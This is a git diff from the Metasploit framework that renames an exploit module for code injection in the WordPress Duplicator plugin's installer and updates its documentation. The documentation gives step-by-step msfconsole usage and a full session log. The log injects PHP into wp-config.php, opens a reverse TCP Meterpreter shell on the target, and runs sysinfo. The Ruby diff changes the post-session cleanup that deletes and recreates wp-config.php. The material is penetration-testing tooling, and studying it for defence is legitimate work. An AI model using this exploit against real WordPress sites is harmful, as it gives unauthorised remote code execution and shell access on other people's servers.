diff --git a/documentation/modules/exploit/multi/php/wordpress_duplicator.md b/documentation/modules/exploit/multi/php/wp_duplicator_code_inject.md similarity index 64% rename from documentation/modules/exploit/multi/php/wordpress_duplicator.md rename to documentation/modules/exploit/multi/php/wp_duplicator_code_inject.md index f471c39e79..177da9c9f2 100644 --- a/documentation/modules/exploit/multi/php/wordpress_duplicator.md +++ b/documentation/modules/exploit/multi/php/wp_duplicator_code_inject.md @@ -23,7 +23,7 @@ Put the `install.php` and archive files on a clean web server. Confirm that functionality works: 1. Start `msfconsole` -2. `use exploit/multi/php/wordpress_duplicator` +2. `use exploit/multi/php/wp_duplicator_code_inject` 3. Set the `RHOST`. 4. Confirm the target is vulnerable: `check` 5. Confirm that the target is vulnerable: `The target is vulnerable.` @@ -44,26 +44,29 @@ The path to the installer.php file to exploit By default, the path is `/installe ### Debian 9 running WordPress 4.9.8 with Duplicator 1.2.40 ``` -msf5 > use exploit/multi/php/wordpress_duplicator -msf5 exploit(multi/php/wordpress_duplicator) > set RHOSTS 1.1.1.1 -RHOSTS => 192.168.56.101 -msf5 exploit(multi/php/wordpress_duplicator) > set LHOST 192.168.56.1 -LHOST => 192.168.56.1 -msf5 exploit(multi/php/wordpress_duplicator) > set TARGETURI /installer_vuln.php -TARGETURI => /installer_vuln.php -msf5 exploit(multi/php/wordpress_duplicator) > run +msf5 > use exploit/multi/php/wp_duplicator_code_inject +msf5 exploit(multi/php/wp_duplicator_code_inject) > set rhosts 192.168.37.247 +rhosts => 192.168.37.247 +msf5 exploit(multi/php/wp_duplicator_code_inject) > set targeturi /wordpress/installer.php +targeturi => /wordpress/installer.php +msf5 exploit(multi/php/wp_duplicator_code_inject) > set lhost 192.168.37.1 +lhost => 192.168.37.1 +msf5 exploit(multi/php/wp_duplicator_code_inject) > run -[*] Started reverse TCP handler on 192.168.56.1:4444 +[*] Started reverse TCP handler on 192.168.37.1:4444 [*] Checking if the wp-config.php file already exists... -[*] This WordPress was not restored. Creating the wp-config.php file... -[*] Successfully created the wp-config.php file! [*] All good! Injecting PHP code in the wp-config.php file... [*] Requesting wp-config.php to execute the payload... -[*] Sending stage (37775 bytes) to 1.1.1.1 +[*] Sending stage (38247 bytes) to 192.168.37.247 +[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.247:1251) at 2018-12-11 11:46:16 -0600 +[*] Attempting to recreate wp-config file... +[*] Found archive name 20181127_test_site_126e49aaa44976fa5226181127215223_archive.zip +[*] Successfully created the wp-config.php file! -meterpreter > sysinfo -Computer : debian -OS : Linux debian 4.9.0-6-amd64 #1 SMP Debian 4.9.88-1+deb9u1 (2018-05-07) x86_64 -Meterpreter : php/linux +meterpreter > sysinfo +Computer : WIN-0FAJA14JLP4 +OS : Windows NT WIN-0FAJA14JLP4 6.1 build 7601 (Windows 7 Enterprise Edition Service Pack 1) i586 +Meterpreter : php/windows +meterpreter > ``` diff --git a/modules/exploits/multi/php/wordpress_duplicator.rb b/modules/exploits/multi/php/wp_duplicator_code_inject.rb similarity index 95% rename from modules/exploits/multi/php/wordpress_duplicator.rb rename to modules/exploits/multi/php/wp_duplicator_code_inject.rb index 0bfdd4dbeb..a7d8fb5414 100644 --- a/modules/exploits/multi/php/wordpress_duplicator.rb +++ b/modules/exploits/multi/php/wp_duplicator_code_inject.rb @@ -143,12 +143,13 @@ class MetasploitModule < Msf::Exploit::Remote end def on_new_session(client) - if client.type.eql? 'meterpreter' - client.core.use 'stdapi' unless client.ext.aliases.include? 'stdapi' - client.fs.file.rm 'wp-config.php' + if client.type.eql?('meterpreter') + client.core.use('stdapi') unless client.ext.aliases.include?('stdapi') + client.fs.file.rm('wp-config.php') else - client.shell_command_token 'rm wp-config.php' + client.shell_command_token('rm wp-config.php') end + print_status("Attempting to recreate wp-config file...") create_wp_config_file end end